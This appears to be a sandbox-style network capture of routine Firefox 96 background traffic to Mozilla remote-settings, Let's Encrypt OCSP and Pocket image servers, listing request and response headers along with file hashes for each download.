Sha256: 47c0dd6c5fc10426222d636044456fa1a459f5a2a1e368e934c0202ab0593a4d
                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         143.204.55.25
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Fri, 30 Sep 2022 18:50:55 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Mon, 03 Oct 2022 22:29:48 GMT
etag: "67d5a988edcda47bc3b3b3f65d32b4b6"
x-cache: Hit from cloudfront
via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: sse4XxDjLrXD6vnAXM5cR_pIRJuPZkf5piYAAnjaypgiQvGKZRTWrQ==
age: 41044
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    67d5a988edcda47bc3b3b3f65d32b4b6
Sha1:   d4f0e0da8b3690cc7da925026d3414b68c7d954f
Sha256: 55e4848e3ec682e808ce7ee70950f86179c43af4f81926d826a95edfda395a78
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Alert, Backoff, Retry-After, Content-Length
Cache-Control: max-age=3600
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Tue, 04 Oct 2022 08:56:17 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: ke6eMqtmHd2cJyckGATEjRjHLzMwIIiGJzJ2d1kh-aLNSayCmPaA9w==
Age: 3454


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    2d12f67fe57a87e7366b662d153a5582
Sha1:   d7b02d81cc74f24a251d9363e0f4b0a149264ec1
Sha256: 73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551
                                        
                                            GET /staging/addons-bloomfilters/67600448-6fc2-4f40-bd4a-8687d731734f.bin HTTP/1.1 
Host: firefox-settings-attachments.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.30
HTTP/1.1 200 OK
Content-Type: application/octet-stream
                                        
Content-Length: 795699
Connection: keep-alive
Last-Modified: Mon, 27 Jun 2022 12:39:11 GMT
x-amz-version-id: 9np1boOrxtHVWzMczpbX1a.N_ewQWHDF
Accept-Ranges: bytes
Server: AmazonS3
Date: Tue, 04 Oct 2022 05:06:47 GMT
ETag: "9b95765b0e26af76116a95a966d61354"
X-Cache: Hit from cloudfront
Via: 1.1 8e6dce34fd223e0c9d89fd938d1784a2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: r0TLdP4DsTeiaZtdtUweiU-tOW4MJjqiQrN7lBOzFHCouggLqJswZw==
Age: 31801


--- Additional Info ---
Magic:  data
Size:   795699
Md5:    9b95765b0e26af76116a95a966d61354
Sha1:   3f7c1b40fc999b83f3696f455402e49ab484b027
Sha256: 34f969c8e082310785ec4262e2d5b58c919d4de856ffc64b3467507f83ac9571
                                        
                                            GET /v1/buckets/main/collections/normandy-recipes-capabilities/changeset?_expected=1664841664930&_since=%221654732864402%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Content-Type, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Tue, 04 Oct 2022 00:01:04 GMT
X-Content-Type-Options: nosniff
Content-Encoding: br
Date: Tue, 04 Oct 2022 09:11:59 GMT
Cache-Control: max-age=3600
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 9okdu_OrklSNlwTR3YSfYCzp-2wvg4S37spNeV9FWBZT2Jwiw6foCA==
Age: 2602


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (58918), with no line terminators
Size:   12205
Md5:    bf797f1c12f4c97b84a1db110e6c9631
Sha1:   8aaabe0750b31d2a7394c54ebfbfc9d5aa7a933c
Sha256: 0bf40e761d9808fd1603815b08d7b797ca7a9a25cefe0a0b0ed6941c8cbf2f0d
                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
If-Modified-Since: Fri, 30 Sep 2022 18:50:55 GMT
If-None-Match: "67d5a988edcda47bc3b3b3f65d32b4b6"
TE: trailers

                                         
                                         143.204.55.25
HTTP/2 304 Not Modified
                                        
last-modified: Fri, 30 Sep 2022 18:50:55 GMT
content-disposition: attachment
server: AmazonS3
date: Mon, 03 Oct 2022 22:29:48 GMT
etag: "67d5a988edcda47bc3b3b3f65d32b4b6"
x-cache: Hit from cloudfront
via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: t6dJNpbVodMMK3WDvGySe1cnbWYH5rTdr9n899vopsIFz2M2RR4cDw==
age: 41044
X-Firefox-Spdy: h2

                                        
                                            GET /v1/buckets/main/collections/nimbus-desktop-experiments/changeset?_expected=1664576981597&_since=%221654636467710%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Alert, Backoff, Retry-After, Content-Length
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 30 Sep 2022 22:29:41 GMT
X-Content-Type-Options: nosniff
Content-Encoding: br
Date: Tue, 04 Oct 2022 09:08:20 GMT
Cache-Control: max-age=3600
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: _eBSsLEjMbg9vFijNCneJnHaoA3leC24Wun1uoK2tedEzwnEfOnNMw==
Age: 3235


--- Additional Info ---
Magic:  ASCII text, with very long lines (31812), with no line terminators
Size:   4522
Md5:    0a8cfe2efc6b0b24150c549ab477643e
Sha1:   ea11b76b989c1cca396d75cb40774bbd014ef689
Sha256: 86f672ecf608509aa0e411d8b80f9e4bb5c1e877040957d56a53ae69897d5ecd
                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
If-Modified-Since: Fri, 30 Sep 2022 18:50:55 GMT
If-None-Match: "67d5a988edcda47bc3b3b3f65d32b4b6"
TE: trailers

                                         
                                         143.204.55.25
HTTP/2 304 Not Modified
                                        
last-modified: Fri, 30 Sep 2022 18:50:55 GMT
content-disposition: attachment
server: AmazonS3
date: Mon, 03 Oct 2022 22:29:48 GMT
etag: "67d5a988edcda47bc3b3b3f65d32b4b6"
x-cache: Hit from cloudfront
via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: 96hqpmGX4nKg90mq1i5BVfi0ewvivyXE7Jc9G9QRJHCnoydvZKLecQ==
age: 41045
X-Firefox-Spdy: h2

                                        
                                            GET /v1/buckets/main/collections/fxmonitor-breaches/changeset?_expected=1662044085942&_since=%221622732735407%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Retry-After, Alert, Content-Length, Content-Type, Backoff
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Thu, 01 Sep 2022 14:54:45 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Tue, 04 Oct 2022 09:35:46 GMT
Cache-Control: max-age=3600
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 1sn65VoNljtzyON1Yh0iPJKVVjJ0_p1eqpv2Yosg2XK83mUsMNcHfQ==
Age: 1086


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (20423), with no line terminators
Size:   5855
Md5:    10baf28aac846a3698df02337eaf7cee
Sha1:   6b67e052ee8a728c5481a6a6b54d6a0a4833638b
Sha256: 21c252701f27eb5480fb536f519278dcde70168b69c9cb6e225a01116a171a87
                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         143.204.55.25
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 05:28:28 GMT
etag: "6113f8408c59aebe188d6af273b90743"
x-cache: Hit from cloudfront
via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: cA494y6ZlsCaHObLdIN7Rq4Li_j345uzsK__JrIQnzWrktpIlsVfXg==
age: 15925
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    6113f8408c59aebe188d6af273b90743
Sha1:   7398873bf00f99944eaa77ad3ebc0d43c23dba6b
Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
                                        
                                            GET /v1/buckets/main/collections/password-rules/changeset?_expected=1659924409785&_since=%221652712410939%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Content-Length, Backoff, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Mon, 08 Aug 2022 02:06:49 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Content-Encoding: br
Date: Tue, 04 Oct 2022 09:35:01 GMT
Cache-Control: max-age=3600
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 4Houv1jL5zwnNGK9CIOI9bgNiRZQl8uUUvX5g4VafGgJQMN9opvmCg==
Age: 1136


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (1393), with no line terminators
Size:   780
Md5:    7cc9023d283eac5c86c23ef7d8d53612
Sha1:   18ebd937973c42f4252969afbacab560993826e7
Sha256: 08e9a89b6e7d1515b92b073c37ae0f41e50d4df90247356043d03d9dbef29324
                                        
                                            GET /v1/buckets/main/collections/websites-with-shared-credential-backends/changeset?_expected=1659924446436&_since=%221650898092205%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Alert, Backoff, Retry-After, Content-Length
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Mon, 08 Aug 2022 02:07:26 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Wed, 28 Sep 2022 05:56:48 GMT
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: BD1knkIy4xEK3oZj_oLtL9Us0-gPZbULKVskVxWCbiAUGE2qUDHF4g==
Age: 533159


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (8682), with no line terminators
Size:   3275
Md5:    a3d031972a53ce7c0335f6110586ec9c
Sha1:   4c32da8a240101524c01ec333cc53a07f1d2ebff
Sha256: e93d587a4c0e1168b7c65a904f99bcdf262a8f0d70dcc716a95e9288c2a03e86
                                        
                                            GET /v1/buckets/main/collections/search-config/changeset?_expected=1661199949574&_since=%221648132005528%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Content-Type, Alert, Backoff, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Mon, 22 Aug 2022 20:25:49 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Tue, 04 Oct 2022 09:44:14 GMT
Cache-Control: max-age=3600
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: kTajLcJg8DD6v7VSOa3guvz28mw9R0sTd4LAiCfLiw5MnuZnGDCesA==
Age: 598


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (14029), with no line terminators
Size:   3393
Md5:    28bf4850d0381c6e4a223d862f122b2d
Sha1:   aaaf470779861678a2cd105303b37cdefc93302f
Sha256: 3d9c1eac8a6567be6c86a852c60704f8387d24603ea87b2b61d9d3bc6e33be0a
                                        
                                            GET /v1/buckets/main/collections/cfr/changeset?_expected=1659547595259&_since=%221653578606314%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Alert, Content-Type, Backoff, Content-Length, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Wed, 03 Aug 2022 17:26:35 GMT
X-Content-Type-Options: nosniff
Content-Encoding: br
Date: Tue, 04 Oct 2022 09:29:01 GMT
Cache-Control: max-age=3600
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: hL0lLMe1-9poDyUsRXlfdbvfl-X7O3zhdECKesU0mdUAXko8MnRiUQ==
Age: 1629


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (3678), with no line terminators
Size:   1411
Md5:    198ef0717b8812aadc957d1e2ff4aafb
Sha1:   08061aca9c054ec44311c30eb09c67ee1e80fd47
Sha256: d96caf25a8a96003398ac403de9b499673bfcb56643a710f0c54433153655427
                                        
                                            GET /v1/buckets/main/collections/hijack-blocklists?_expected=1605801189258 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 682
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Alert, Content-Type, Expires, Backoff, ETag, Last-Modified, Pragma, Cache-Control, Content-Length, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Mon, 26 Sep 2022 16:36:56 GMT
X-Content-Type-Options: nosniff
Date: Tue, 04 Oct 2022 09:42:26 GMT
Cache-Control: no-cache, no-store, max-age=3600
ETag: "1664210216116"
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: aDoduvRCqv7oOqgQ7trTEAj1YPGqJzjOTXz5pwXtgcl339nhRAVM_g==
Age: 687


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (682), with no line terminators
Size:   682
Md5:    4e767b65980ef55063cce1d7f423c58e
Sha1:   f6f9756deac632f187752ff6708a2e3a71a04ebc
Sha256: 132e8f66a926b19d6a3ff32ca5bf385272b3b9be5e748cd21b9bb02a13a661e9
                                        
                                            GET /v1/buckets/main/collections/query-stripping/changeset?_expected=1656585893704&_since=%221649762862679%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Alert, Backoff, Content-Length, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Thu, 30 Jun 2022 10:44:53 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Content-Encoding: br
Date: Mon, 03 Oct 2022 15:57:46 GMT
Cache-Control: max-age=259200
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: e9A8Wao8KbuT5C0Si5ECScux8YOjpcwXZheOGB_kqIcS_zbExeHOjA==
Age: 64614


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (1710), with no line terminators
Size:   900
Md5:    7b0f15820fbc79772d69b103cb111800
Sha1:   92ccda464b19ef35736c03edd82b578661361212
Sha256: 7c9d70c6fbae326155f72c8d40252871c3067597192f4d604cc2b46dfd4b2527
                                        
                                            GET /v1/buckets/main/collections/partitioning-exempt-urls/changeset?_expected=1657747510534&_since=%221654266643527%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Content-Type, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Wed, 13 Jul 2022 21:25:10 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Tue, 04 Oct 2022 09:43:08 GMT
Cache-Control: max-age=3600
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: TnHUP48KZMsnlcaJaRg2jVDCKegCbLRBEV7DmaP89GeHjWdca3yWtg==
Age: 1004


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (2194), with no line terminators
Size:   1080
Md5:    4286df03a653e5b403e88a8d28933306
Sha1:   8f974648aef7d271443707ce3a6eba8d9a117872
Sha256: 16e99009a0917eedd380140055d06b29d6709bd469d694d078c013f7c104367a
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14134
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 09:53:52 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14134
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 09:53:52 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14134
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 09:53:52 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14134
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 09:53:52 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8641c47a-9aff-4f73-bb07-6770cbbcc8d6.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5504
x-amzn-requestid: 37405eb0-5c75-46a9-84c0-e8ed726995d8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
